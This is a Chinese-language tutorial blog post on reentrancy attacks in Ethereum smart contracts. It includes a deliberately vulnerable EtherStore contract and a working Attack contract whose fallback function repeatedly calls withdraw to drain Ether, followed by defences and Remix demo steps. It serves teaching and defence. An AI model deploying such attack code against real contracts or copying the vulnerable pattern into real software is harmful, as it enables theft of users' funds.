Advertisement

智能合约安全之重入攻击浅析

阅读量:

概述:
重入攻击是由于智能合约调用了外部不安全合约,或者对外发送以太币,使得合约的外部调用能够被劫持,导致合约内的方法被外部合约递归调用

形成重入攻击有如下条件:

1、调用了外部不安全合约
2、使用了不安全的转账方式,未进行gas限制。
3、状态变量修改在合约交互之后

如下为漏洞合约+攻击合约:

// SPDX-License-Identifier: MIT 复制代码 
pragma solidity ^0.8.3;  
contract EtherStore {//漏洞合约

receive() external payable{}  
constructor() payable {}  
mapping(address => uint) internal balances;

function deposit() external payable { //将Eth存入合约  
balances[msg.sender] += msg.value;  
}

function withdraw() external {//将存入的资金取出  
uint balance = balances[msg.sender];  
require(balance > 0);//检查

(bool sent, ) = msg.sender.call{value: balance}("");//交互--发起转账  
require(sent, "Failed to send Ether");

balances[msg.sender] = 0;//生效--状态变量修改  
}

function getBalance() public view returns (uint) {//获取合约余额  
return address(this).balance;  
}  
}

contract Attack {//攻击合约  
EtherStore public etherstore;  
constructor(address payable test) payable {  
etherstore = EtherStore(test);  
}  
function _deposit() public payable {//向漏洞合约存入ETH  
etherstore.deposit{value: 1 ether}();  
}

function attack() public {//开始攻击,取回合约中的ETH  
etherstore.withdraw();  
}

function getbalance() public view returns (uint) {//获取当前合约余额  
return address(this).balance;  
}

  
fallback() external payable{//触发Fallback,递归调用取回函数  
if (address(etherstore).balance > 0) {  
etherstore.withdraw();  
}  
}

}

防御措施:
1、谨防使用不安全的转账函数call,建议使用transfer、send--限制gas为2300;或者对call调用进行gas限制--call{gas:2300};
2、推荐使用检查-生效-交互的模式,状态变量的修改在合约进行外部调用之前。
3、建议为合约加入重入锁,在openzeeplin中--https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/security/ReentrancyGuard.sol

攻击演示:

1、首先在remix上进行合约部署

先对漏洞合约进行部署

再部署攻击合约

2、打开攻击合约进行攻击操作

3、攻击完成(注:1Ether的单位为10的18次方Wei)

全部评论 (0)

还没有任何评论哟~

相关文章推荐

智能合约安全之重入攻击浅析

概述: 重入攻击是由于智能合约调用了外部不安全合约,或者对外发送以太币,使得合约的外部调用能够被劫持,导致合约内的方法被外部合约递归调用 形成重入攻击有如下条件: 1、调用了外部不安全合约 2、使用了...

Solidity 智能合约安全漏洞——跨合约重入攻击

跨合约重入攻击 概述 跨合约重入性是指在智能合约之间发生的重入攻击,这种攻击不仅限于单一合约内部的函数调用,还可能涉及多个合约,尤其是当这些合约共享相同的状态变量时。在跨合约重入攻击中,如果状态更新不...

智能合约之可重入攻击

以太坊智能合约到现在,出现了不少由于合约代码不严谨,导致黑客利用合约代码漏洞进行攻击来获取暴利。接下来我为大家来介绍一下常见的合约漏洞类型,包含重入攻击,短地址攻击,数据溢出攻击,可预测随机数攻击,篡...

Solidity 智能合约安全漏洞——普通重入攻击

普通重入攻击 重入攻击(ReEntrancy)一直是以太坊智能合约中最危险的漏洞之一,导致了许多大规模的资金被盗事件。比如2016年发生在TheDAO项目中的ReEntrancy漏洞攻击,造成价值当时...

Solidity 智能合约安全漏洞——跨函数重入攻击

跨函数重入攻击 概述 跨函数重入攻击是更复杂的一种重入攻击方式,通常出现此问题的原因是多个函数相互共享同一状态变量,并且其中一些函数不安全地更新该变量。这种漏洞允许攻击者在一个函数执行期间通过另一个函...

以太坊智能合约安全漏洞 (1):重入攻击

本文转自公众号:亨利笔记 首发于:<https://hash1024.org/topics/27 本文的英文原文已有若干个中文翻译版本,但译文和原文都有错漏或不足。本文系基于译者(Henry)的理解,...

智能合约安全 | 合约无效化攻击

视频教程在我主页简介或专栏里 (不懂都可以来问我专栏找我哦) 目录: 智能合约安全 合约无效化攻击 合约自毁函数selfdestruct 攻击实现 漏洞防御 总结 智能合约安全 合约无效化攻击 合约无...

智能合约安全 | 合约无效化攻击

视频教程和更多福利在我主页简介或专栏里 (不懂都可以来问我专栏找我哦) 目录: 智能合约安全 合约无效化攻击 合约自毁函数selfdestruct 攻击实现 漏洞防御 总结 智能合约安全 合约无效化攻...

智能合约安全:短地址攻击

昨天一位博友提到短地址攻击的问题,感觉挺有意思的,就花了点时间研究了一下。 1.什么是短地址攻击 大家都知道,如果我们想调用智能合约的函数,需要在交易的payload字段中填充一段字节码。

智能合约_联盟链智能合约安全浅析

作者:极光@知道创宇404区块链安全研究团队 时间:2020年8月27日 前言 随着区块链技术的发展,越来越多的个人及企业也开始关注区块链,而和区块链联系最为紧密的,恐怕就是金融行业了。